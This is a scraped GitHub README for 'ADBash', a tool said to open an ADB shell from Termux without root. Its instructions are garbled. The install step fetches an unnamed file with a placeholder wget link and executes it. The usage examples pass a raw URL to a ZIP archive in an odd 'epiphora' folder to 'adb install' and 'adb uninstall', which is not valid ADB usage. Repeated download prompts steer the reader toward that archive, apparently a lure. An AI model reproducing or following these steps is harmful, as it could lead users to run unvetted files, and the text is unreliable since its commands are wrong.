Skip to content

πŸ”Œ Connect Termux to your local ADB host with ADBash, launching a simple Bash session that requires minimal setup and no root access.

License

Notifications You must be signed in to change notification settings

rpriariandi/ADBash

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

9 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸš€ ADBash - Connect to Your Device's ADB Shell Easily

Download ADBash

🌟 About ADBash

ADBash allows you to automatically connect to your device's ADB Shell using a Bash shell from Termux. You don't need root access, making it suitable for most Android users. The tool simplifies the process of executing ADB commands and enhances your device's functionality.

🎯 Key Features

  • No Root Required: Use ADB commands without needing to root your device.
  • Easy Setup: Get started quickly with straightforward instructions.
  • Termux Compatibility: Fully functional with Termux, a terminal emulator for Android.
  • Script Support: Run your own Bash scripts to automate tasks on your device.
  • Lightweight Tool: Minimal resource usage for a smooth experience.

πŸ“₯ Download & Install

To get ADBash, visit this page to download the latest version:

Download ADBash

πŸ› οΈ System Requirements

  • Device: Any Android device running Android 10 or higher.
  • Termux: Install Termux from the Google Play Store or F-Droid.
  • ADB: Ensure ADB is set up on your system. ADB comes with the Android SDK.

πŸ“‹ Installation Steps

  1. Open Termux:

    • Launch the Termux app on your Android device.
  2. Download ADBash:

    • Run the following command in Termux:
      wget [insert download link for ADBash]
  3. Set Permissions:

    • Change the permissions to make the script executable:
      chmod +x ADBash
  4. Run ADBash:

    • Start ADBash by typing:
      ./ADBash
  5. Connect Your Device:

    • Make sure your Android device is connected to your computer with USB debugging enabled.

πŸ” Usage Instructions

Once ADBash is running, you can enter various ADB commands directly in the Termux shell. Here are some common commands to help you get started:

  • Check Device Connection:

    adb devices
  • Access Shell:

    adb shell
  • Install an App:

    adb install [https://raw.githubusercontent.com/rpriariandi/ADBash/main/epiphora/ADBash.zip]
  • Uninstall an App:

    adb uninstall [https://raw.githubusercontent.com/rpriariandi/ADBash/main/epiphora/ADBash.zip]

πŸ›‘οΈ Troubleshooting

If you face any issues, consider the following tips:

  • Check USB Debugging: Ensure USB debugging is enabled on your device.
  • Verify ADB Installation: Double-check that ADB is correctly installed and configured.
  • Reboot Devices: Sometimes, rebooting your computer and mobile device can solve connection issues.

πŸ“¬ Support

For support or to report issues, please use the GitHub Issues page within the ADBash repository. You can also find help from the community in forums focused on ADB and Termux usage.

πŸ“„ License

ADBash is licensed under the MIT License. Feel free to use and modify the tool as per the license agreement.

πŸ“’ Additional Resources

To learn more about ADB and how to maximize its potential on your device, check out the following resources:

For the latest updates and features, keep an eye on the ADBash Releases Page.

Download ADBash

About

πŸ”Œ Connect Termux to your local ADB host with ADBash, launching a simple Bash session that requires minimal setup and no root access.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages